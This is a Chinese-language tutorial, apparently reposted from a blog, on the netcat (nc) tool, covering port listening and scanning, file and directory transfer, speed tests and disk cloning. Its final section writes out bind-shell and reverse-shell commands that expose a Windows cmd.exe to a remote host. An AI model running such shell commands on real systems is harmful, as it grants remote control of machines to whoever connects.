nc工具使用(netcap)
nc工具使用
原文地址:https://www.cnblogs.com/zhaijiahui/p/9028402.html#autoid-3-0-0
功能說明:
功能強大的網路工具,在網路工具中有“瑞士軍刀”美譽,其有Windows和Linux的版本。
因為它短小精悍,功能實用,被設計為一個簡單、可靠的網路工具,可通過TCP或UDP協議傳輸讀寫資料。
同時,它還是一個網路應用Debug分析器,因為它可以根據需要建立各種不同型別的網路連線。
nc的作用
(1)實現任意TCP/UDP埠的偵聽,nc可以作為server以TCP或UDP方式偵聽指定埠
(2)埠的掃描,nc可以作為client發起TCP或UDP連線
(3)傳輸檔案
(4)網路測速
(5)克隆硬碟或分割槽
(6)反彈伺服器shell
nc的常用的幾個引數如下所列:
- -l
用於指定nc將處於偵聽模式。指定該引數,則意味著nc被當作server,偵聽並接受連線,而非向其它地址發起連線。 - -p <port>
暫未用到(老版本的nc可能需要在埠號前加-p引數,下面測試環境是centos6.6,nc版本是nc-1.84,未用到-p引數) - -s
指定傳送資料的源IP地址,適用於多網絡卡機 - -u
指定nc使用UDP協議,預設為TCP - -v
輸出互動或出錯資訊,新手除錯時尤為有用
6)-w
超時秒數,後面跟數字
7)-z
表示zero,表示掃描時不傳送任何資料
複製程式碼
nc的用法介紹
用法1、 網路連通性測試和埠掃描
1.tcp監聽
nc可以作為server端啟動一個tcp的監聽,預設情況下下面監聽的是一個tcp的埠
nc -l -p 9999
客戶端測試
1、在B機器上telnet A機器此埠,如下顯示錶示B機器可以訪問A機器此埠
telnet 10.0.1.161 9999
2、B機器上也可以使用nmap掃描A機器的此埠
nmap 10.0.1.161 -p9999
3、使用nc命令作為客戶端工具進行埠探測
nc -vz -w 2 10.0.1.161 9999
(-v視覺化,-z掃描時不傳送資料,-w超時幾秒,後面跟數字)
服務端會自動關閉監聽。
4、nc可以掃描連續埠,這個作用非常重要。常常可以用來掃描伺服器埠,然後給伺服器安全加固
在客戶端B機器上掃描連續的兩個埠,如下
nc -vzw 2 10.0.1.161 9998-9999
2.udp監聽
nc作為server端啟動一個udp的監聽(注意,此處重點是起udp,上面主要講了tcp)
啟動一個udp的埠監聽
nc -ul -p 9998
複製當前視窗輸入 netstat -antup |grep 9998 可以看到是啟動了udp的監聽
測試方法
1、
nc -vuz 10.0.1.161 9998
(u表示udp埠,v表示視覺化輸出,z表示掃描時不傳送資料)
由於udp的埠無法在客戶端使用telnet去測試,我們可以使用nc命令去掃描。
(telnet是運行於tcp協議的)
上面在B機器掃描此埠的時候,看到A機器下面出現一串XXXXX字串(我測試時出現兩個a)
2、
nmap -sU 10.0.1.161 -p 9998
-sU :表示udp埠的掃描
注意:如果A機器開啟了防火牆,掃描結果可能會是下面狀態。(不能確定對方是否有監聽9998埠)
nmap -sU 10.0.1.161 -p 9998 -Pn
既然上面測試無法使用nmap掃描nc作為服務端啟動的埠,我們可以使用nmap掃描其餘的埠
(額,有點跑題了,講nmap的用法了,沒關係,主要為了說明nmap是也可以用來掃描udp埠的,只是掃描nc啟動的埠會導致對方退出埠監聽)
下面,A機器上rpcbind服務,監聽在udp的111埠
netstat -anup | grep 111
在B機器上使用nmap掃描此埠,是正常的檢測到處於open狀態
udp埠掃描
掃描過程比較慢,可能是1秒掃描一個埠,下面表示掃描A機器的1到1000埠(暫未發現可以在一行命令中掃描分散的幾個埠的方法)
nc -vuz 10.0.1.161 1-1000
用法2、 使用nc傳輸檔案和目錄
方法1,先啟動接收命令
使用nc傳輸檔案還是比較方便的,因為不用scp和rsync那種輸入密碼的操作了
把A機器上的一個rpm檔案傳送到B機器上
需注意操作次序,receiver先偵聽埠,sender向receiver所在機器的該埠傳送資料。
步驟1,先在B機器上啟動一個接收檔案的監聽,格式如下
意思是把賴在9995埠接收到的資料都寫到file檔案裡(這裡檔名隨意取)
格式:nc -l port >file
nc -l -p 9995 >zabbix.rpm
步驟2,在A機器上往B機器的9995埠傳送資料,把下面rpm包傳送過去
nc 10.0.1.162 9995 < zabbix-release-2.4-1.el6.noarch.rpm
方法2,先啟動傳送命令
步驟1,先在B機器上,啟動傳送檔案命令
下面命令表示通過本地的9992埠傳送test.mv檔案
nc -l -p 9992 <test.mv
步驟2,A機器上連線B機器,取接收檔案
下面命令表示通過連線B機器的9992埠接收檔案,並把檔案存到本目錄下,檔名為test2.mv
nc 10.0.1.162 9992 >test2.mv
方法3,傳輸目錄演示(方法傳送檔案類似)
步驟1,B機器先啟動監聽,如下
A機器給B機器傳送多個檔案
傳輸目錄需要結合其它的命令,比如tar
經過我的測試管道後面最後必須是 - ,不能是其餘自定義的檔名
nc -l -p 9995 | tar xzvf -
步驟2,A機器打包檔案並連線B機器的埠
管道前面表示把當前目錄的所有檔案打包為 - ,然後使用nc傳送給B機器
tar cfz - * | nc 10.0.1.162 9995
或者
tar czvf – nginx-0.6.34|nc 192.168.228.222 1234
B機器這邊已經自動接收和解壓
方法4,拼接命令傳輸
使用nc進行檔案傳輸,命令
ssh [email protected] “( nc -l 10003 > destination 2>/dev/null & )” && cat source | nc www.freetstar.com 10003
&& 前邊ssh登入到遠端主機www.freetstar.com上,用nc命令開啟本地的10003埠,成為後臺程序
&&後邊,在本地機器上開啟source檔案,並將其重定向到www.freetstar.com的10003號埠,也就是讓遠端www.freetstar.com主機10003號埠接收source檔案
用法3、 測試網速
測試網速其實利用了傳輸檔案的原理,就是把來自一臺機器的/dev/zero 傳送給另一臺機器的/dev/null
就是把一臺機器的無限個0,傳輸給另一個機器的空裝置上,然後新開一個視窗使用dstat命令監測網速
在這之前需要保證機器先安裝dstat工具
yum install -y dstat
方法1,測試網速演示(先啟動接收命令方式)
步驟1,A機器先啟動接收資料的命令,監聽自己的9991埠,把來自這個埠的資料都輸出給空裝置(這樣不寫磁碟,測試網速更準確)
nc -l 9991 >/dev/null
步驟2,B機器傳送資料,把無限個0傳送給A機器的9991埠
nc 10.0.1.161 9991 </dev/zero
在複製的視窗上使用dstat命令檢視當前網速,dstat命令比較直觀,它可以檢視當前cpu,磁碟,網路,記憶體頁和系統的一些當前狀態指標。
我們只需要看下面我選中的這2列即可,recv是receive的縮寫,表示接收的意思,send是傳送資料,另外注意數字後面的單位B,KB,MB
方法2,測試網速演示(先啟動傳送命令方式)
步驟1,先啟動傳送的資料,誰連線這個埠時就會接收來自zero裝置的資料(二進位制的無限個0)
nc -l 9990 </dev/zero
步驟2,下面B機器連線A機器的9990埠,把接收的資料輸出到空裝置上
nc 10.0.1.161 9990 >/dev/null
同樣可以使用dstat觀察資料傳送時的網速
用法4、 克隆硬碟或分割槽
操作與上面的拷貝是雷同的,只需要由dd獲得硬碟或分割槽的資料,然後傳輸即可。
克隆硬碟或分割槽的操作,不應在已經mount的的系統上進行。所以,需要使用安裝光碟引導後,進入拯救模式(或使用Knoppix工 具光碟)啟動系統後,在server2上進行類似的監聽動作:
# nc -l -p 1234 | dd of=/dev/sda
server1上執行傳輸,即可完成從server1克隆sda硬碟到server2的任務:
# dd if=/dev/sda | nc 192.168.228.222 1234
※ 完成上述工作的前提,是需要落實光碟的拯救模式支援伺服器上的網絡卡,並正確配置IP。
用法5、 反彈伺服器shell
方法1、REMOTE主機繫結SHELL
在公網監聽
nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
或者
nc -l -p 5555 -t -e cmd.exe
在內網主動建立連線
nc -nvv 192.168.153.138 5555
-t是通過telne模式執行 cmd.exe 程式,可以省略。
講解:繫結REMOTE主機的CMDSHELL在REMOTE主機的TCP5354埠
方法2、REMOTE主機繫結SHELL並反向連線
在公網監聽
nc -lp 5555
在內網機器反彈
nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
或者
nc -t -e cmd 192.168.153.140 5555
講解:繫結REMOTE主機的CMDSHELL並反向連線到192.168.x.x的TCP5354埠
以上為最基本的幾種用法(其實NC的用法還有很多,
當配合管道命令"|"與重定向命令"<"、">"等等命令功能更強大......)。